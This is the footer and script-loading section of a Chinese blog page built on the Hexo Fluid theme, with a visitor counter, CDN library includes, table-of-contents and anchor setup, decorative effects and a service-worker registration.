        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    
  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/DynamicRibbon.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/snowflake.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/containsWord.min.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<script async>window.onload=function(){var a=document.createElement('script'),b=document.getElementsByTagName('script')[0];a.type='text/javascript',a.async=!0,a.src='/sw-register.js?v='+Date.now(),b.parentNode.insertBefore(a,b)};</script></body></html>